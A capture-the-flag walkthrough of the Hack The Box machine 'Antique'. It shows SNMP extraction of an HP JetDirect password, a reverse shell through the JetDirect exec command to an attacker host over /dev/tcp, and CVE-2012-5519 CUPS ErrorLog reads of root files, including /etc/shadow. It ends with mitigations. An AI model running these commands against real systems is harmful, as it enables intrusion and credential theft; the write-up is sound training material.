• OS: Linux (Ubuntu)
• Domain / vhosts: none

Summary

Antique is a Linux Easy that teaches two underappreciated attack surfaces: SNMP as a credential store and CUPS ErrorLog as an arbitrary file read primitive. The box simulates an HP JetDirect network printer. SNMP on UDP 161 (community string public) exposes the JetDirect admin password as a hex-encoded BITS value in a well-known OID. Decoding the hex gives the password for the TCP/23 service, which is not real Telnet but an HP JetDirect shell emulator. That shell has an exec command that passes arguments directly to the OS, giving a shell as lp. The lp user belongs to lpadmin, which can reconfigure CUPS via cupsctl. CUPS 1.6.1 running as root on localhost is vulnerable to CVE-2012-5519: setting ErrorLog to any file path causes CUPS to serve that file through its web interface, achieving arbitrary file read as root.

Kill-chain: nmap -sU finds SNMP on UDP/161 → snmpwalk with community public + HP JetDirect OID .1.3.6.1.4.1.11.2.3.9.1.1.13.0 → hex bytes decode to admin password → Telnet port 23 JetDirect shell → exec bash -c '...' reverse shell → lp → CUPS 1.6.1 localhost on port 631 → cupsctl ErrorLog=/root/root.txt + curl 127.0.0.1:631/admin/log/error_log → root flag.

Source attribution

• 0xdf, “HTB: Antique” — https://0xdf.gitlab.io/2022/05/03/htb-antique.html. Primary source. Covers the UDP SNMP scan, the HP JetDirect OID, hex decoding, the JetDirect exec backdoor, and CVE-2012-5519 CUPS ErrorLog file read.
• IppSec, “Antique” video walkthrough — https://ippsec.rocks/?#Antique.
• CVE-2012-5519 (CUPS cupsctl ErrorLog arbitrary file read).

Recon

TCP scan:

nmap -p- --min-rate 10000 -oA nmap/alltcp <TARGET>
nmap -sCV -p 23 -oA nmap/scripts <TARGET>

23/tcp  open  telnet?
| fingerprint-strings:
|   NULL: JetDirect
|   [most probes]: JetDirect Password:

Only port 23 open. The banner JetDirect identifies this as an HP JetDirect printer management interface, not a standard Telnet service.

UDP scan (essential — TCP alone misses the entry point):

sudo nmap -sU --top-ports 10 -sV <TARGET>

161/udp  open  snmp  SNMPv1 server (public)

SNMP is open with the default public community string.

SNMP enumeration — JetDirect password OID

Broad walk confirms the device identity:

snmpwalk -v 2c -c public <TARGET>
# → iso.3.6.1.2.1 = STRING: "HTB Printer"

HP JetDirect devices store the Telnet admin password at a well-known enterprise OID:

snmpwalk -v 2c -c public <TARGET> .1.3.6.1.4.1.11.2.3.9.1.1.13.0

iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32
33 21 21 31 32 33 1 3 9 17 18 ...

The value is returned as a BITS type (hex-encoded bytes). Decode the leading printable-ASCII portion in Python:

data = "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33"
''.join([chr(int(x, 16)) for x in data.split()])

The decoded string is the JetDirect admin password. The trailing non-printable bytes are padding artefacts from the SNMP implementation.

Foothold — HP JetDirect exec backdoor

telnet <TARGET>

HP JetDirect

Password: <decoded password>

Please type "?" for HELP
> 

The ? command lists available operations. The exec command passes its arguments to the OS shell:

> exec id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)

Trigger a reverse shell:

# Attack machine listener
nc -lvnp 443

> exec bash -c 'bash -i >& /dev/tcp/<ATTACKER>/443 0>&1'

lp@antique:~$ id
uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)

user.txt is at /home/lp/user.txt.

Privilege escalation — CVE-2012-5519 (CUPS ErrorLog arbitrary file read)

Enumerate local services:

netstat -tnlp

tcp  0  0  0.0.0.0:23      0.0.0.0:*  LISTEN  -
tcp  0  0  127.0.0.1:631   0.0.0.0:*  LISTEN  -

CUPS is listening on 127.0.0.1:631. Identify the version:

curl -s http://127.0.0.1:631/ | grep -i cups
# → CUPS 1.6.1

CUPS 1.6.1 is vulnerable to CVE-2012-5519. The cupsd daemon runs as root and serves an administrative HTTP interface. The cupsctl utility allows members of the lpadmin group to set configuration parameters including ErrorLog — the path to the file CUPS writes error log entries to. When this path is changed to an arbitrary file, CUPS serves that file’s contents at /admin/log/error_log on its web interface. Since cupsd reads the file as root, this is an arbitrary file read as root.

# Point ErrorLog at root.txt
cupsctl ErrorLog=/root/root.txt

# Retrieve via CUPS web interface
curl http://127.0.0.1:631/admin/log/error_log?

The root flag is returned in the response body.

The same primitive reads any file:

cupsctl ErrorLog=/etc/shadow
curl http://127.0.0.1:631/admin/log/error_log?

Why each step worked

• SNMP UDP 161 missed by default TCP scan: nmap without -sU does not scan UDP ports. SNMP on UDP/161 is extremely common on network devices and printers but is invisible to TCP-only reconnaissance. Always run a UDP scan (--top-ports 10 or -p 161) against targets that might be appliances.
• SNMP community string public: public is the factory-default read community string for nearly every SNMP-capable device. Vendors ship with it enabled and network administrators routinely leave it unchanged. No authentication is required to query any OID with the public community.
• HP JetDirect OID .1.3.6.1.4.1.11.2.3.9.1.1.13.0: this enterprise OID is documented in HP’s MIB and returns the JetDirect admin password in the SNMP BITS encoding (raw hex). The pattern is well-known in the penetration testing literature: SNMP data from printers and appliances often contains credentials at documented enterprise OIDs.
• JetDirect exec command: HP JetDirect’s administrative shell is intended for printer configuration. The exec command was added to allow running diagnostic utilities but provides an unrestricted OS shell. Any authenticated user (with the correct password) can run arbitrary commands.
• CVE-2012-5519 — lpadmin + CUPS ErrorLog: CUPS grants lpadmin group members the ability to modify printer configuration including ErrorLog. The intent was to let printer administrators redirect logs. Since cupsd runs as root and reads the log path without restriction, an lpadmin member can redirect ErrorLog to any file, including /root/root.txt or /etc/shadow. This is a design flaw: the capability to set file paths was granted without restricting which paths are permissible.

Counterfactuals

• Disable SNMP or change the community string from public to a strong, random value. Remove the JetDirect password OID from the SNMP MIB if remote password retrieval is not required.
• Disable the exec command in the JetDirect configuration, or firewall port 23 at the network perimeter. Management interfaces for printers and appliances should not be reachable from general networks.
• Upgrade CUPS to 1.7.0+ (CVE-2012-5519 was patched in 1.7.0). Restrict lpadmin group membership to users who genuinely need to administer printers.
• Consider restricting the CUPS ErrorLog path via a systemd ReadWritePaths= directive so cupsd cannot open arbitrary files on the filesystem.

Key Takeaways

• Always run a UDP scan: -sU --top-ports 10 takes ~30 seconds and frequently reveals SNMP (161), TFTP (69), or other services invisible to TCP scans. On network appliances it is almost mandatory.
• SNMP public community on printers exposes credentials: HP JetDirect OID .1.3.6.1.4.1.11.2.3.9.1.1.13.0 returns the admin password as hex BITS. The Python decode pattern chr(int(x,16)) converts each byte. Check vendor-specific enterprise MIBs for any SNMP-enabled device.
• lpadmin group membership is a CUPS file-read primitive on old versions: CVE-2012-5519 requires only lpadmin group membership and CUPS 1.6.x or older. Check CUPS version and group membership immediately after landing on a Linux host running a printing service.
• cupsctl ErrorLog=<path> + curl 127.0.0.1:631/admin/log/error_log: the two-command primitive. Works on any localhost CUPS 1.6.x regardless of network exposure.

References

• 0xdf, “HTB: Antique” — https://0xdf.gitlab.io/2022/05/03/htb-antique.html
• IppSec, “Antique” — https://ippsec.rocks/?#Antique
• CVE-2012-5519 (CUPS ErrorLog arbitrary file read)
• HP JetDirect SNMP OID reference — .1.3.6.1.4.1.11.2.3.9.1.1.13.0